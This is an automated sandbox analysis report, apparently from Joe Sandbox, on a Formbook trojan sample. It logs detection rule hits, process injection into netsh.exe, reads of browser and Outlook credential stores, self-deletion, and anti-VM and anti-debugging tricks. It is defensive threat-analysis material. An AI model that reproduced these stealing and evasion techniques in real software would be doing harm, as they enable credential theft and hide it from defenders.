            Source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: yZcecBUXN7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.yZcecBUXN7.exe.5140000.3.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.yZcecBUXN7.exe.5140000.3.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
            Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@14/12
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yZcecBUXN7.exe.logJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\netsh.exeFile created: C:\Users\user\AppData\Local\Temp\1-00F23LJump to behavior
            Source: yZcecBUXN7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: yZcecBUXN7.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netsh.exe, 00000004.00000002.4123105715.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4123105715.0000000000FC5000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.2195893631.0000000000FE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: yZcecBUXN7.exeReversingLabs: Detection: 28%
            Source: yZcecBUXN7.exeVirustotal: Detection: 37%
            Source: unknownProcess created: C:\Users\user\Desktop\yZcecBUXN7.exe "C:\Users\user\Desktop\yZcecBUXN7.exe"
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess created: C:\Users\user\Desktop\yZcecBUXN7.exe "C:\Users\user\Desktop\yZcecBUXN7.exe"
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
            Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess created: C:\Users\user\Desktop\yZcecBUXN7.exe "C:\Users\user\Desktop\yZcecBUXN7.exe"Jump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: yZcecBUXN7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: yZcecBUXN7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: yZcecBUXN7.exe, 00000000.00000002.1628173538.0000000005330000.00000004.08000000.00040000.00000000.sdmp, yZcecBUXN7.exe, 00000000.00000002.1626818477.0000000002A71000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: netsh.pdb source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E41000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000000.1770920776.000000000004E000.00000002.00000001.01000000.00000007.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000000.1972232269.000000000004E000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: wntdll.pdbUGP source: yZcecBUXN7.exe, 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1897494718.0000000001227000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1902030596.000000000358C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netsh.pdbGCTL source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E41000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: yZcecBUXN7.exe, yZcecBUXN7.exe, 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000004.00000003.1897494718.0000000001227000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1902030596.000000000358C000.00000004.00000020.00020000.00000000.sdmp
            Source: yZcecBUXN7.exeStatic PE information: 0xCA00A32F [Sun May 23 23:50:07 2077 UTC]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0041A0EC push esi; retf 1_2_0041A0BC
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0041133C push esp; retf 1_2_0041133D
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_00408397 push esp; iretd 1_2_004083AC
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_00413551 push eax; ret 1_2_00413552
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_004035E0 push eax; ret 1_2_004035E2
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_00404E45 push ds; iretd 1_2_00404E44
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_00404E1C push ds; iretd 1_2_00404E44
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_00404E23 push ds; iretd 1_2_00404E44
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_00404ECD push ds; iretd 1_2_00404E44
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_004186EA push ebx; ret 1_2_004186EB
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010D225F pushad ; ret 1_2_010D27F9
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010D27FA pushad ; ret 1_2_010D27F9
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011009AD push ecx; mov dword ptr [esp], ecx1_2_011009B6
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010D283D push eax; iretd 1_2_010D2858
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010D1368 push eax; iretd 1_2_010D1369
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037709AD push ecx; mov dword ptr [esp], ecx4_2_037709B6
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03741350 push eax; iretd 4_2_03741369
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C16B14 push esi; retf 4_2_00C16AD9
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C1CB14 push eax; iretd 4_2_00C1CB15
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C04DB4 push esp; iretd 4_2_00C04DC9
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C1B1BD push 00000049h; iretd 4_2_00C1B1BF
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C018EA push ds; iretd 4_2_00C01861
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C01840 push ds; iretd 4_2_00C01861
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C01862 push ds; iretd 4_2_00C01861
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C01839 push ds; iretd 4_2_00C01861
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C0D957 push ebx; retf 4_2_00C0D958
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C0FB80 push edi; iretd 4_2_00C0FBBC
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C11D56 push ds; ret 4_2_00C11D57
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C0DD59 push esp; retf 4_2_00C0DD5A
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C0FF6E push eax; ret 4_2_00C0FF6F
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C1FF2B push esi; retf 4_2_00C1FF2C
            Source: yZcecBUXN7.exeStatic PE information: section name: .text entropy: 7.633926656601929

            Hooking and other Techniques for Hiding and Protection

            barindex
            Deletes itself after installation
            Source: C:\Windows\SysWOW64\netsh.exeFile deleted: c:\users\user\desktop\yzcecbuxn7.exeJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: yZcecBUXN7.exe PID: 6640, type: MEMORYSTR
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeMemory allocated: CC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeMemory allocated: 4A70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0114096E rdtsc 1_2_0114096E
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_00401D30 sldt word ptr [eax]1_2_00401D30
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeWindow / User API: threadDelayed 1723Jump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeWindow / User API: threadDelayed 8248Jump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netsh.exeAPI coverage: 2.3 %
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe TID: 6744Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exe TID: 3716Thread sleep count: 1723 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netsh.exe TID: 3716Thread sleep time: -3446000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exe TID: 3716Thread sleep count: 8248 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netsh.exe TID: 3716Thread sleep time: -16496000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724Thread sleep time: -46500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724Thread sleep count: 37 > 30Jump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724Thread sleep time: -37000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C1B710 FindFirstFileW,FindNextFileW,FindClose,4_2_00C1B710
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123417601.000000000127F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
            Source: netsh.exe, 00000004.00000002.4123105715.0000000000F74000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2314438483.000001B1F3C9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0114096E rdtsc 1_2_0114096E
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_004172C3 LdrLoadDll,1_2_004172C3
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AA118 mov ecx, dword ptr fs:[00000030h]1_2_011AA118
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AA118 mov eax, dword ptr fs:[00000030h]1_2_011AA118
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AA118 mov eax, dword ptr fs:[00000030h]1_2_011AA118
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AA118 mov eax, dword ptr fs:[00000030h]1_2_011AA118
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C0115 mov eax, dword ptr fs:[00000030h]1_2_011C0115
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov eax, dword ptr fs:[00000030h]1_2_011AE10E
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov ecx, dword ptr fs:[00000030h]1_2_011AE10E
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov eax, dword ptr fs:[00000030h]1_2_011AE10E
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov eax, dword ptr fs:[00000030h]1_2_011AE10E
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov ecx, dword ptr fs:[00000030h]1_2_011AE10E
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov eax, dword ptr fs:[00000030h]1_2_011AE10E
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov eax, dword ptr fs:[00000030h]1_2_011AE10E
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov ecx, dword ptr fs:[00000030h]1_2_011AE10E
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov eax, dword ptr fs:[00000030h]1_2_011AE10E
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov ecx, dword ptr fs:[00000030h]1_2_011AE10E
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01130124 mov eax, dword ptr fs:[00000030h]1_2_01130124
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01198158 mov eax, dword ptr fs:[00000030h]1_2_01198158
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01106154 mov eax, dword ptr fs:[00000030h]1_2_01106154
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01106154 mov eax, dword ptr fs:[00000030h]1_2_01106154
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FC156 mov eax, dword ptr fs:[00000030h]1_2_010FC156
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01194144 mov eax, dword ptr fs:[00000030h]1_2_01194144
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01194144 mov eax, dword ptr fs:[00000030h]1_2_01194144
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01194144 mov ecx, dword ptr fs:[00000030h]1_2_01194144
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01194144 mov eax, dword ptr fs:[00000030h]1_2_01194144
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01194144 mov eax, dword ptr fs:[00000030h]1_2_01194144
